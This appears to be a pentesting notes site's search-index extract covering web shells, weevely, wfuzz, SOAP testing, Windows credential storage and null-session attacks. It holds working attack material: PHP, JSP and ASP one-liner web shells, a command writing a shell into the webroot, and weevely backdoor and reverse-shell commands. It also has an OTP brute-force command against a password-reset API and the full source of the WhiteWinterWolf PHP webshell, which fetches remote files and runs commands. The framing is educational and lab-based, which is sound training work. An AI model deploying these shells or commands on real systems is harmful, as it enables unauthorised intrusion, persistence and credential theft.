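For example, fetching the WSDL document with curl (URL is illustrative):

curl http://example.com/webservice?wsdl\n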

                            ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#authentication-and-authorization-testing","title":"Authentication and Authorization Testing","text":"

Invoke hidden methods, i.e., operations that are defined in the WSDL but not exposed through the regular client.

                            • Test the authentication mechanisms in place (e.g., username/password, tokens) to ensure they prevent unauthorized access.
                            • Verify that users are correctly authenticated and authorized to access specific operations and resources.
                            • Input Validation Testing:
                              • Test for input validation vulnerabilities, such as SQL injection, cross-site scripting (XSS), and XML-based attacks.

                            • Send malicious input data to the web service's input parameters to identify potential security weaknesses. For instance, command injection attacks:
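As a sketch, a command-injection probe inside a SOAP parameter could look like this (operation and parameter names are hypothetical):

<soap:Body>\n  <HostLookup xmlns=\"http://example.com/\">\n    <host>127.0.0.1; id</host>\n  </HostLookup>\n</soap:Body>\n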

                            ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#the-soapaction-header","title":"The SOAPAction header","text":"

                            The SOAPAction header is a transport protocol header (either HTTP or JMS). It is transmitted with SOAP messages, and provides information about the intention of the web service request, to the service. The WSDL interface for a web service defines the SOAPAction header value used for each operation. Some web service implementations use the SOAPAction header to determine behavior.
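Since some implementations route requests on this header rather than on the message body, a simple test is to replay a captured request changing only the SOAPAction value and check whether a different (possibly hidden) operation is invoked. The operation name below is hypothetical:

SOAPAction: \"http://example.com/DeleteUser\"\n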

                            ","tags":["pentesting","webservices","soap"]},{"location":"web-shells/","title":"Web shells","text":"All about shells Shell Type Description Reverse shell Initiates a connection back to a \"listener\" on our attack box. Bind shell \"Binds\" to a specific port on the target host and waits for a connection from our attack box. Web shell Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a\u00a0PHP\u00a0script to run a single command.

Preconfigured webshells in Kali Linux

                            Go to /usr/share/webshells/

                            Other resources

                            See reverse shells

                            A Web Shell is typically a web script that accepts our command through HTTP request parameters, executes our command, and prints its output back on the web page.

                            A web shell script is typically a one-liner that is very short and can be memorized easily.

                            ","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#some-basic-web-shells","title":"Some basic web shells","text":"","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#php","title":"php","text":"
                            <?php system($_REQUEST[\"cmd\"]); ?>\n
                            • Pentesmonkey webshell.
                            • WhiteWinterWolf webshell.
                            ","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#jsp","title":"jsp","text":"
                            <% Runtime.getRuntime().exec(request.getParameter(\"cmd\")); %>\n
                            ","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#asp","title":"asp","text":"
                            <% eval request(\"cmd\") %>\n
                            ","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#how-to-exploit-a-web-shell","title":"How to exploit a web shell","text":"","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#file-upload-vs-remote-code-execution","title":"File upload vs Remote code execution","text":"

                            1. FILE UPLOAD: By abusing an upload feature. We would place this web shell script into the remote host's web directory to execute the script through the web browser.

2. REMOTE CODE EXECUTION: By writing our one-liner shell to the webroot to access it over the web. This applies if we only have remote command execution as an exploit vector. Here is an example for bash:

                            echo '<?php system($_REQUEST[\"cmd\"]); ?>' > /var/www/html/shell.php\n

                            So, for the second way of exploitation, it's relevant to identify where the webroot is. The following are the default webroots for common web servers:

• Apache: /var/www/html/
• Nginx: /usr/local/nginx/html/
• IIS: c:\\inetpub\\wwwroot\\
• XAMPP: C:\\xampp\\htdocs\\
","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#accessing-the-web-shell","title":"Accessing the web shell","text":"

We can access the web shell using the browser, or curl:

                            curl http://SERVER_IP:PORT/shell.php?cmd=id\n

A benefit of a web shell is that it bypasses any firewall restriction in place: it does not open a new connection on a separate port but runs over the web port, 80 or 443, or whatever port the web application is using.

                            ","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#tools","title":"Tools","text":"

                            About webshells.

                            Laudanum

                            nishang

                            ","tags":["pentesting","webshell","reverse-shells"]},{"location":"webdav-wsgidav/","title":"WsgiDAV: A generic and extendable WebDAV server","text":"

                            A generic and extendable WebDAV server written in Python and based on WSGI.

                            ","tags":["pentesting","windows","server"]},{"location":"webdav-wsgidav/#installation","title":"Installation","text":"

                            Download from github repo: https://github.com/mar10/wsgidav.

                            sudo pip install wsgidav cheroot\n
                            ","tags":["pentesting","windows","server"]},{"location":"webdav-wsgidav/#basis-usage","title":"Basis usage","text":"
                            sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous \n
                            ","tags":["pentesting","windows","server"]},{"location":"weevely/","title":"weevely","text":"

Weevely is a stealth PHP web shell that simulates a telnet-like connection. It is an essential tool for web application post-exploitation, and can be used as a stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones.

                            # Generate backdoor agent\nweevely generate <password> <path/to/save/your/phpBackdoorNamefile.php>\n#generate is for generating a backdoor\n# password to access the file\n\n# Then, you upload the file into the victim's server and use weevely to connect\n# Run terminal to the target\n weevely <URL> <password> [cmd]\n\n\n# Load session file\nweevely session <path>\n

                            Upload weevely PHP agent to a target web server to get remote shell access to it. It has more than 30 modules to assist administrative tasks, maintain access, provide situational awareness, elevate privileges, and spread into the target network.

                            • Read the\u00a0Install\u00a0page to install weevely and its dependencies.
                            • Read the\u00a0Getting Started\u00a0page to generate an agent and connect to it.
                            • Browse the\u00a0Wiki\u00a0to read examples and use cases.
                            ","tags":["pentesting\u00e7","web","pentesting","enumeration"]},{"location":"weevely/#example-from-a-lab","title":"Example from a lab","text":"

Generate a php webshell with Weevely and save it as an image:

                            weevely generate secretpassword example.png \n

                            Upload it to the application.

                            Make the connection with weevely:

                            weevely https://example.com/uploads/example.jpg/example.php secretpassword\n

                            ","tags":["pentesting\u00e7","web","pentesting","enumeration"]},{"location":"weevely/#weevely-commands","title":"weevely commands","text":"
# Ask for help\nweevely> help\n

                            In an attack you will probably need:

                            # Read /etc/passwd with different techniques. Nice touch here is that weevely can bypass some restriction introduced in \"cat /etc/passwd\". For that it uses the attribute -vector\n:audit_etcpasswd            \n# -vector: posix_getpwuid, file, fread, file_get_contents, base64\n\n# Collect system information\n:system_info\n\n# Audit the file system for weak permissions.\n:audit_filesystem\n\n# Execute shell commands, BUT the cool part is that it bypasses the inability to run a bash command by tunnelling into a different language command. To see available languages, use the attribute -h\n:shell_sh -vector <VectorValue> <Command>\n# -vector With attribute vector you can choose to execute bash through php, python...\n\n# Download file from remote filesystem.\n:file_download -vector <VECTORValue> <rpath> <lpath>\n# -vector: file, fread, file_get_contents, base64\n# rpath: remote path of the file you want to download\n# lpath: location where you want to save it\n\n\n# Upload file to remote filesystem.\n:file_upload \n\n# Execute a reverse TCP shell.\n:backdoor_reversetcp -shell <SHELLType> -npo-autonnet -vector <VALUEofVector> <LHOST> <LPORT> \n:backdoor_reversetcp -h\n
                            ","tags":["pentesting\u00e7","web","pentesting","enumeration"]},{"location":"weevely/#weevely-complete-list-of-commands","title":"weevely complete list of commands","text":"Module Description :audit_filesystem Audit the file system for weak permissions. :audit_suidsgid Find files with SUID or SGID flags. :audit_disablefunctionbypass Bypass disable_function restrictions with mod_cgi and .htaccess. :audit_etcpasswd Read /etc/passwd with different techniques. :audit_phpconf Audit PHP configuration. :shell_sh Execute shell commands. :shell_su Execute commands with su. :shell_php Execute PHP commands. :system_extensions Collect PHP and webserver extension list. :system_info Collect system information. :system_procs List running processes. :backdoor_reversetcp Execute a reverse TCP shell. :backdoor_tcp Spawn a shell on a TCP port. :bruteforce_sql Bruteforce SQL database. :file_gzip Compress or expand gzip files. :file_clearlog Remove string from a file. :file_check Get attributes and permissions of a file. :file_upload Upload file to remote filesystem. :file_webdownload Download an URL. :file_tar Compress or expand tar archives. :file_download Download file from remote filesystem. :file_bzip2 Compress or expand bzip2 files. :file_edit Edit remote file on a local editor. :file_grep Print lines matching a pattern in multiple files. :file_ls List directory content. :file_cp Copy single file. :file_rm Remove remote file. :file_upload2web Upload file automatically to a web folder and get corres :file_zip Compress or expand zip files. :file_touch Change file timestamp. :file_find Find files with given names and attributes. :file_mount Mount remote filesystem using HTTPfs. :file_enum Check existence and permissions of a list of paths. :file_read Read remote file from the remote filesystem. :file_cd Change current working directory. :sql_console Execute SQL query or run console. :sql_dump Multi dbms mysqldump replacement. :net_mail Send mail. :net_phpproxy Install PHP proxy on the target. :net_curl Perform a curl-like HTTP request. :net_proxy Run local proxy to pivot HTTP/HTTPS browsing through the :net_scan TCP Port scan. :net_ifconfig Get network interfaces addresses.","tags":["pentesting\u00e7","web","pentesting","enumeration"]},{"location":"wfuzz/","title":"wfuzz","text":"","tags":["pentesting","web pentesting"]},{"location":"wfuzz/#basic-commands","title":"Basic commands","text":"
wfuzz -d '{\"email\":\"hapihacker@hapihacker.com\",\"password\":\"PASSWORD\"}' -H 'Content-Type: application/json' -z file,/usr/share/wordlists/rockyou.txt -u http://localhost:8888/identity/api/auth/login --hc 500\n# -H to specify content-type headers. You use a -H flag for each header\n# -d allows you to include the POST Body data. \n# -u specifies the url\n# --hc/hl/hw/hh hide responses with the specified code/lines/words/chars. In our case, \"--hc 500\" hides 500 code responses.\n# -z specifies a payload   \n
# Fuzzing an old api version which doesn't implement a request limit when resetting password. It allows us to FUZZ the OTP and reset the password for any user.\nwfuzz -d '{\"email\":\"hapihacker@hapihacker.com\", \"otp\":\"FUZZ\", \"password\":\"NewPasswordreseted\"}' -H 'Content-Type: application/json' -z file,/usr/share/wordlists/SecLists-master/Fuzzing/4-digits-0000-9999.txt -u http://localhost:8888/identity/api/auth/v2/check-otp  --hc 500\n

                            Subdomain enumeration:

wfuzz -c --hc 404 -t 200 -u https://nunchucks.htb/ -w /usr/share/dirb/wordlists/common.txt -H \"Host: FUZZ.nunchucks.htb\" --hl 546\n# -c: Color in output\n# --hc 404: Hide 404 code responses\n# -t 200: Concurrent Threads\n# -u https://nunchucks.htb/: Target URL\n# -w /usr/share/dirb/wordlists/common.txt: Wordlist \n# -H \"Host: FUZZ.nunchucks.htb\": Header. Also with \"FUZZ\" we indicate the injection point for payloads\n# --hl 546: Filter out responses with a specific number of lines. In this case, 546\n
                            ","tags":["pentesting","web pentesting"]},{"location":"wfuzz/#encoding","title":"Encoding","text":"
# Check which wfuzz encoders are available\nwfuzz -e encoders\n\n# To use an encoder, add a comma to the payload and specify the encoder name\nwfuzz -z file,path/to/payload.txt,base64 http://hacking-example.com/api/v2/FUZZ\n\n# Using multiple encoders. Each payload will be processed in separate requests.  \nwfuzz -z list,a,base64-md5-none \n# this results in three payloads: one encoded in base64, another in md5 and last with none. \n\n# Each payload will be processed by multiple encoders.\nwfuzz -z file,payload1-payload2,base64@md5@random_upper -u http://hacking-example.com/api/v2/FUZZ\n
                            ","tags":["pentesting","web pentesting"]},{"location":"wfuzz/#dealing-with-rate-limits-in-apis","title":"Dealing with rate limits (in APIs)","text":"
                            -s  Specify a time delay between requests.\n-t Specify the concurrent number of connections\n
                            ","tags":["pentesting","web pentesting"]},{"location":"whatweb/","title":"whatweb","text":"

                            WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.

                            ","tags":["pentesting","web pentesting","enumeration"]},{"location":"whatweb/#installation","title":"Installation","text":"

                            Already installed in Kali.

                            Download from: https://github.com/urbanadventurer/WhatWeb

                            ","tags":["pentesting","web pentesting","enumeration"]},{"location":"whatweb/#basic-usage","title":"Basic usage","text":"
                            # version of web servers, supporting frameworks, and applications\nwhatweb $ip\nwhatweb <hostname>\n\n# Automate web application enumeration across a network.\nwhatweb --no-errors 10.10.10.0/24\n\n\nwhatweb -a3 https://www.example.com -v\n# -a3: aggression level 3\n# -v: verbose mode\n
                            ","tags":["pentesting","web pentesting","enumeration"]},{"location":"whitewinterwolf-webshell/","title":"WhiteWinterWolf php webshell","text":"

                            Source: https://github.com/WhiteWinterWolf/wwwolf-php-webshell/blob/master/webshell.php.

It is similar to the Antak Webshell (aspx, from the nishang project), but in php. It generates a page on the server from which we can indicate the ip and port where we want to receive the output of the commands we run.

                            <?php\n/*******************************************************************************\n * Copyright 2017 WhiteWinterWolf\n * https://www.whitewinterwolf.com/tags/php-webshell/\n *\n * This file is part of wwolf-php-webshell.\n *\n * wwwolf-php-webshell is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation, either version 3 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program.  If not, see <http://www.gnu.org/licenses/>.\n ******************************************************************************/\n\n/*\n * Optional password settings.\n * Use the 'passhash.sh' script to generate the hash.\n * NOTE: the prompt value is tied to the hash!\n */\n$passprompt = \"WhiteWinterWolf's PHP webshell: \";\n$passhash = \"\";\n\nfunction e($s) { echo htmlspecialchars($s, ENT_QUOTES); }\n\nfunction h($s)\n{\n    global $passprompt;\n    if (function_exists('hash_hmac'))\n    {\n        return hash_hmac('sha256', $s, $passprompt);\n    }\n    else\n    {\n        return bin2hex(mhash(MHASH_SHA256, $s, $passprompt));\n    }\n}\n\nfunction fetch_fopen($host, $port, $src, $dst)\n{\n    global $err, $ok;\n    $ret = '';\n    if (strpos($host, '://') === false)\n    {\n        $host = 'http://' . $host;\n    }\n    else\n    {\n        $host = str_replace(array('ssl://', 'tls://'), 'https://', $host);\n    }\n    $rh = fopen(\"${host}:${port}${src}\", 'rb');\n    if ($rh !== false)\n    {\n        $wh = fopen($dst, 'wb');\n        if ($wh !== false)\n        {\n            $cbytes = 0;\n            while (! feof($rh))\n            {\n                $cbytes += fwrite($wh, fread($rh, 1024));\n            }\n            fclose($wh);\n            $ret .= \"${ok} Fetched file <i>${dst}</i> (${cbytes} bytes)<br />\";\n        }\n        else\n        {\n            $ret .= \"${err} Failed to open file <i>${dst}</i><br />\";\n        }\n        fclose($rh);\n    }\n    else\n    {\n        $ret = \"${err} Failed to open URL <i>${host}:${port}${src}</i><br />\";\n    }\n    return $ret;\n}\n\nfunction fetch_sock($host, $port, $src, $dst)\n{\n    global $err, $ok;\n    $ret = '';\n    $host = str_replace('https://', 'tls://', $host);\n    $s = fsockopen($host, $port);\n    if ($s)\n    {\n        $f = fopen($dst, 'wb');\n        if ($f)\n        {\n            $buf = '';\n            $r = array($s);\n            $w = NULL;\n            $e = NULL;\n            fwrite($s, \"GET ${src} HTTP/1.0\\r\\n\\r\\n\");\n            while (stream_select($r, $w, $e, 5) && !feof($s))\n            {\n                $buf .= fread($s, 1024);\n            }\n            $buf = substr($buf, strpos($buf, \"\\r\\n\\r\\n\") + 4);\n            fwrite($f, $buf);\n            fclose($f);\n            $ret .= \"${ok} Fetched file <i>${dst}</i> (\" . strlen($buf) . 
\" bytes)<br />\";\n        }\n        else\n        {\n            $ret .= \"${err} Failed to open file <i>${dst}</i><br />\";\n        }\n        fclose($s);\n    }\n    else\n    {\n        $ret .= \"${err} Failed to connect to <i>${host}:${port}</i><br />\";\n    }\n    return $ret;\n}\n\nini_set('log_errors', '0');\nini_set('display_errors', '1');\nerror_reporting(E_ALL);\n\nwhile (@ ob_end_clean());\n\nif (! isset($_SERVER))\n{\n    global $HTTP_POST_FILES, $HTTP_POST_VARS, $HTTP_SERVER_VARS;\n    $_FILES = &$HTTP_POST_FILES;\n    $_POST = &$HTTP_POST_VARS;\n    $_SERVER = &$HTTP_SERVER_VARS;\n}\n\n$auth = '';\n$cmd = empty($_POST['cmd']) ? '' : $_POST['cmd'];\n$cwd = empty($_POST['cwd']) ? getcwd() : $_POST['cwd'];\n$fetch_func = 'fetch_fopen';\n$fetch_host = empty($_POST['fetch_host']) ? $_SERVER['REMOTE_ADDR'] : $_POST['fetch_host'];\n$fetch_path = empty($_POST['fetch_path']) ? '' : $_POST['fetch_path'];\n$fetch_port = empty($_POST['fetch_port']) ? '80' : $_POST['fetch_port'];\n$pass = empty($_POST['pass']) ? '' : $_POST['pass'];\n$url = $_SERVER['REQUEST_URI'];\n$status = '';\n$ok = '&#9786; :';\n$warn = '&#9888; :';\n$err = '&#9785; :';\n\nif (! empty($passhash))\n{\n    if (function_exists('hash_hmac') || function_exists('mhash'))\n    {\n        $auth = empty($_POST['auth']) ? h($pass) : $_POST['auth'];\n        if (h($auth) !== $passhash)\n        {\n            ?>\n                <form method=\"post\" action=\"<?php e($url); ?>\">\n                    <?php e($passprompt); ?>\n                    <input type=\"password\" size=\"15\" name=\"pass\">\n                    <input type=\"submit\" value=\"Send\">\n                </form>\n            <?php\n            exit;\n        }\n    }\n    else\n    {\n        $status .= \"${warn} Authentication disabled ('mhash()' missing).<br />\";\n    }\n}\n\nif (! ini_get('allow_url_fopen'))\n{\n    ini_set('allow_url_fopen', '1');\n    if (! ini_get('allow_url_fopen'))\n    {\n        if (function_exists('stream_select'))\n        {\n            $fetch_func = 'fetch_sock';\n        }\n        else\n        {\n            $fetch_func = '';\n            $status .= \"${warn} File fetching disabled ('allow_url_fopen'\"\n                . \" disabled and 'stream_select()' missing).<br />\";\n        }\n    }\n}\nif (! ini_get('file_uploads'))\n{\n    ini_set('file_uploads', '1');\n    if (! ini_get('file_uploads'))\n    {\n        $status .= \"${warn} File uploads disabled.<br />\";\n    }\n}\nif (ini_get('open_basedir') && ! ini_set('open_basedir', ''))\n{\n    $status .= \"${warn} open_basedir = \" . ini_get('open_basedir') . \"<br />\";\n}\n\nif (! chdir($cwd))\n{\n  $cwd = getcwd();\n}\n\nif (! empty($fetch_func) && ! empty($fetch_path))\n{\n    $dst = $cwd . DIRECTORY_SEPARATOR . basename($fetch_path);\n    $status .= $fetch_func($fetch_host, $fetch_port, $fetch_path, $dst);\n}\n\nif (ini_get('file_uploads') && ! empty($_FILES['upload']))\n{\n    $dest = $cwd . DIRECTORY_SEPARATOR . basename($_FILES['upload']['name']);\n    if (move_uploaded_file($_FILES['upload']['tmp_name'], $dest))\n    {\n        $status .= \"${ok} Uploaded file <i>${dest}</i> (\" . $_FILES['upload']['size'] . \" bytes)<br />\";\n    }\n}\n?>\n\n<form method=\"post\" action=\"<?php e($url); ?>\"\n    <?php if (ini_get('file_uploads')): ?>\n        enctype=\"multipart/form-data\"\n    <?php endif; ?>\n    >\n    <?php if (! 
empty($passhash)): ?>\n        <input type=\"hidden\" name=\"auth\" value=\"<?php e($auth); ?>\">\n    <?php endif; ?>\n    <table border=\"0\">\n        <?php if (! empty($fetch_func)): ?>\n            <tr><td>\n                <b>Fetch:</b>\n            </td><td>\n                host: <input type=\"text\" size=\"15\" id=\"fetch_host\" name=\"fetch_host\" value=\"<?php e($fetch_host); ?>\">\n                port: <input type=\"text\" size=\"4\" id=\"fetch_port\" name=\"fetch_port\" value=\"<?php e($fetch_port); ?>\">\n                path: <input type=\"text\" size=\"40\" id=\"fetch_path\" name=\"fetch_path\" value=\"\">\n            </td></tr>\n        <?php endif; ?>\n        <tr><td>\n            <b>CWD:</b>\n        </td><td>\n            <input type=\"text\" size=\"50\" id=\"cwd\" name=\"cwd\" value=\"<?php e($cwd); ?>\">\n            <?php if (ini_get('file_uploads')): ?>\n                <b>Upload:</b> <input type=\"file\" id=\"upload\" name=\"upload\">\n            <?php endif; ?>\n        </td></tr>\n        <tr><td>\n            <b>Cmd:</b>\n        </td><td>\n            <input type=\"text\" size=\"80\" id=\"cmd\" name=\"cmd\" value=\"<?php e($cmd); ?>\">\n        </td></tr>\n        <tr><td>\n        </td><td>\n            <sup><a href=\"#\" onclick=\"cmd.value=''; cmd.focus(); return false;\">Clear cmd</a></sup>\n        </td></tr>\n        <tr><td colspan=\"2\" style=\"text-align: center;\">\n            <input type=\"submit\" value=\"Execute\" style=\"text-align: right;\">\n        </td></tr>\n    </table>\n\n</form>\n<hr />\n\n<?php\nif (! empty($status))\n{\n    echo \"<p>${status}</p>\";\n}\n\necho \"<pre>\";\nif (! empty($cmd))\n{\n    echo \"<b>\";\n    e($cmd);\n    echo \"</b>\\n\";\n    if (DIRECTORY_SEPARATOR == '/')\n    {\n        $p = popen('exec 2>&1; ' . $cmd, 'r');\n    }\n    else\n    {\n        $p = popen('cmd /C \"' . $cmd . '\" 2>&1', 'r');\n    }\n    while (! feof($p))\n    {\n        echo htmlspecialchars(fread($p, 4096), ENT_QUOTES);\n        @ flush();\n    }\n}\necho \"</pre>\";\n\nexit;\n?>\n
                            ","tags":["webshell","php"]},{"location":"window-detective/","title":"Window Detective - A tool to view windows properties in the system","text":"","tags":["pentesting","windows","thick client"]},{"location":"window-detective/#installation","title":"Installation","text":"

                            Download it from: \u00a0Window Detective

                            ","tags":["pentesting","windows","thick client"]},{"location":"windows-binaries/","title":"Windows binaries - LOLBAS - LOLBAS","text":"

The Windows equivalent of Linux SUID binaries would be LOLBAS (Living Off The Land Binaries, Scripts and Libraries): https://lolbas-project.github.io/.

                            ","tags":["pentesting","privilege escalation","windows"]},{"location":"windows-credentials-storage/","title":"Windows credentials storage","text":"

                            Microsoft documentation.

                            ","tags":["windows"]},{"location":"windows-credentials-storage/#how-login-happens","title":"How login happens","text":"

                            The Local Security Authority (LSA) is a protected subsystem that authenticates users and logs them into the local computer.

                            Source: HackTheBox Academy. Module Password attacks.

                            ","tags":["windows"]},{"location":"windows-credentials-storage/#lsass","title":"LSASS","text":"

                            Local Security Authority Subsystem Service (LSASS) is a collection of many modules and has access to all authentication processes that can be found in %SystemRoot%\\System32\\Lsass.exe. This service is responsible for the local system security policy, user authentication, and sending security audit logs to the Event log.

                            The LSA has the following components:

                            Netlogon.dll . The Net Logon service. Net Logon maintains the computer's secure channel to a domain controller. It passes the user's credentials through a secure channel to the domain controller and returns the domain security identifiers and user rights for the user. In Windows\u00a02000, the Net Logon service uses DNS to resolve names to the Internet Protocol (IP) addresses of domain controllers. Net Logon is the replication protocol for Microsoft\u00ae Windows\u00a0NT\u00ae version\u00a04.0 primary domain controllers and backup domain controllers.

                            Msv1_0.dll . The NTLM authentication protocol. This protocol authenticates clients that do not use Kerberos authentication.

                            Schannel.dll . The Secure Sockets Layer (SSL) authentication protocol. This protocol provides authentication over an encrypted channel instead of a less-secure clear channel.

                            Kerberos.dll . The Kerberos\u00a0v5 authentication protocol.

                            Kdcsvc.dll . The Kerberos Key Distribution Center (KDC) service, which is responsible for granting ticket-granting tickets to clients.

                            Lsasrv.dll . The LSA server service, which enforces security policies.

                            Samsrv.dll . The Security Accounts Manager (SAM), which stores local security accounts, enforces locally stored policies, and supports APIs.

                            Ntdsa.dll . The directory service module, which supports the Windows\u00a02000 replication protocol and Lightweight Directory Access Protocol (LDAP), and manages partitions of data.

                            Secur32.dll . The multiple authentication provider that holds all of the components together.

                            Upon initial logon, LSASS will:

                            • Cache credentials locally in memory
                            • Create access tokens
                            • Enforce security policies
                            • Write to Windows security log
                            ","tags":["windows"]},{"location":"windows-credentials-storage/#gina","title":"GINA","text":"

                            Each interactive logon session creates a separate instance of the Winlogon service. The Graphical Identification and Authentication (GINA) architecture is loaded into the process area used by Winlogon, receives and processes the credentials, and invokes the authentication interfaces via the LSALogonUser function.

                            ","tags":["windows"]},{"location":"windows-credentials-storage/#sam-database","title":"SAM Database","text":"

The Security Account Manager (SAM) is a database file in Windows operating systems that stores users' passwords. It can be used to authenticate local and remote users. User passwords are stored in hash format in a registry structure as either an LM hash or an NTLM hash. This file is located at %SystemRoot%\\system32\\config\\SAM and is mounted on HKLM\\SAM.

                            SYSTEM level permissions are required to view it.
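
                            A minimal sketch of grabbing the SAM once administrative access is obtained (my addition; the output paths and the offline impacket step are illustrative assumptions):

                            reg save HKLM\\SAM C:\\temp\\sam.save\nreg save HKLM\\SYSTEM C:\\temp\\system.save\n\n# Offline, on the attacker machine (impacket):\n# secretsdump.py -sam sam.save -system system.save LOCAL\n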

Windows systems can be assigned to either a workgroup or domain during setup. If the system has been assigned to a workgroup, it handles the SAM database locally and stores all existing users locally in this database. However, if the system has been joined to a domain, the Domain Controller (DC) must validate the credentials against the Active Directory database (ntds.dit), which is stored in %SystemRoot%\\NTDS\\ntds.dit.

                            Microsoft introduced a security feature in Windows NT 4.0 to help improve the security of the SAM database against offline software cracking. This is the SYSKEY (syskey.exe) feature, which, when enabled, partially encrypts the hard disk copy of the SAM file so that the password hash values for all local accounts stored in the SAM are encrypted with a key.

Credential Manager is a feature built into all Windows operating systems that allows users to save the credentials they use to access various network resources and websites. Saved credentials are stored per user profile in each user's Credential Locker. Credentials are encrypted and stored at the following location:

                            PS C:\\Users\\[Username]\\AppData\\Local\\Microsoft\\[Vault/Credentials]\\\n
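
                            As an illustrative, hedged addition, saved credentials can be enumerated from a shell with built-in tools:

                            cmdkey /list\nvaultcmd /listcreds:\"Windows Credentials\" /all\n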
                            ","tags":["windows"]},{"location":"windows-credentials-storage/#domain-controllers","title":"Domain Controllers","text":"

                            Each Domain Controller hosts a file called NTDS.dit that is kept synchronized across all Domain Controllers with the exception of Read-Only Domain Controllers. NTDS.dit is a database file that stores the data in Active Directory, including but not limited to:

                            • User accounts (username & password hash)
                            • Group accounts
                            • Computer accounts
                            • Group policy objects
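
                            A hedged sketch (my addition) of two common ways NTDS.dit secrets are extracted, assuming Domain Admin credentials; domain names and paths are placeholders:

                            # Remotely, with impacket:\nsecretsdump.py domain.local/administrator:'password'@$dc_ip -just-dc-ntlm\n\n# Locally on the DC, dumping a consistent copy with ntdsutil:\nntdsutil \"ac i ntds\" \"ifm\" \"create full C:\\temp\\ntds\" q q\n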
                            ","tags":["windows"]},{"location":"windows-credentials-storage/#tools-for-dumping-credentials","title":"Tools for dumping credentials","text":"
                            • CrackMapExec.
                            • John The Ripper.
                            • Hydra.
                            • Metasploit.
                            • Mimikatz.
                            • pypykatz.
                            • Lazagne.
                            ","tags":["windows"]},{"location":"windows-credentials-storage/#findstr","title":"findstr","text":"

We can also use findstr to search for patterns across many types of files.

                            C:\\> findstr /SIM /C:\"password\" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml\n
                            ","tags":["windows"]},{"location":"windows-null-session-attack/","title":"Windows Null session attack","text":"

It's used to enumerate information (passwords, system users, system groups, running system processes). A null session attack exploits an authentication vulnerability in Windows Administrative Shares. This lets an attacker connect to a local or remote share without authentication.

                            ","tags":["pentesting windows"]},{"location":"windows-null-session-attack/#manually-from-windows","title":"Manually from Windows","text":"
1. Enumerate File Server services:
                            nbtstat -A $ip\n\n# ELS-WINXP   <00>   UNIQUE   Registered\n# <00> tells us ELS-WINXP is a workstation.\n# <20> says that the file sharing service is up and running on the machine\n# UNIQUE tells us that this computer must have only one IP address assigned\n
                            2. Enumerate Windows Shares. Once we spot a machine with the File Server service running, we can enumerate:
                            NET VIEW $ip\n
                            3. Verify if a null session attack is possible by exploiting the IPC$ administrative share and trying to connect without valid credentials.
                            NET USE \\\\$ip\\IPC$ \"\" /u:\"\"\n

This tells Windows to connect to the IPC$ share using an empty password and an empty username. It only works with IPC$ (not C$).

                            ","tags":["pentesting windows"]},{"location":"windows-null-session-attack/#manually-from-linux","title":"Manually from Linux","text":"

                            Using the samba suite: https://www.samba.org/

1. Enumerate File Server services:
                            nmblookup -A $ip\n
                            2. With smbclient we can also enumerate the shares provided by a host:
                            smbclient -L //$ip -N\n\n# -L  Look at what services are available on a target\n# $ip Prepend the two slashes\n# -N  Force the tool not to ask for a password\n
                            3. Connect:
                            smbclient \\\\$ip\\sharedfolder -N\n

                            Be careful, sometimes the shell removes the slashes and you need to escape them.

4. Once connected, you can browse with the smb command line. To see allowed commands: help
5. When you know the path of a file and you want to retrieve it:

                              • from kali:
                                smbget smb://$ip/SharedFolder/flag_1.txt\n
                              • from smb command line:
                                get flag_1.txt\n
6. To map users with permissions:

                            smbmap -H demo.ine.local\n

To get a specific file in a connection: get flag.txt

                            ","tags":["pentesting windows"]},{"location":"windows-null-session-attack/#tricks","title":"Tricks","text":"

                            Enumerate users with enum4linux -U demo.ine.local

                            Enumerate the permissions of users with smbmap -H demo.ine.local

If some users are missing from the permission list, their shares may still be accessible; try:

smbclient //$ip/<user> -N\n
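
                            Another option worth trying here (a hedged addition): a null session over MS-RPC with rpcclient often exposes users even when shares are locked down:

                            rpcclient -U \"\" -N $ip\n\n# Inside the rpcclient shell:\n# enumdomusers\n# queryuser 0x1f4\n# querydominfo\n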
                            ","tags":["pentesting windows"]},{"location":"windows-null-session-attack/#more-tools","title":"More tools","text":"
                            • Winfo.
                            • enum.
                            • enum4linux.
                            • SAMRDump.
                            ","tags":["pentesting windows"]},{"location":"windows-privilege-escalation-history/","title":"Windows: Privilege Escalation - Recently accessed files and executed commands","text":"

Check recently accessed files and executed commands. By default, the PowerShell console history is saved in:

                            C:\\Users\\<account_name>\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt\n
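
                            A hedged convenience sketch (my addition): from a PowerShell session the exact history path can be resolved and read directly:

                            (Get-PSReadLineOption).HistorySavePath\ntype (Get-PSReadLineOption).HistorySavePath\n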
                            ","tags":["windows","privilege escalation"]},{"location":"winfo/","title":"Winfo","text":"

                            Winfo uses Null Session attacks to retrieve account and share information from Windows NT.

                            ","tags":["pentesting windows"]},{"location":"winfo/#installation","title":"Installation","text":"

                            Download it from: https://packetstormsecurity.com/search/?q=winfo&s=files.

                            ","tags":["pentesting windows"]},{"location":"winfo/#basic-command","title":"Basic command","text":"
                            winfo.exe $ip -n\n
                            ","tags":["pentesting windows"]},{"location":"winpeas/","title":"Windows Privilege Escalation Awesome Scripts: winPEAS","text":"

That is exactly what winPEAS stands for: Windows Privilege Escalation Awesome Scripts.

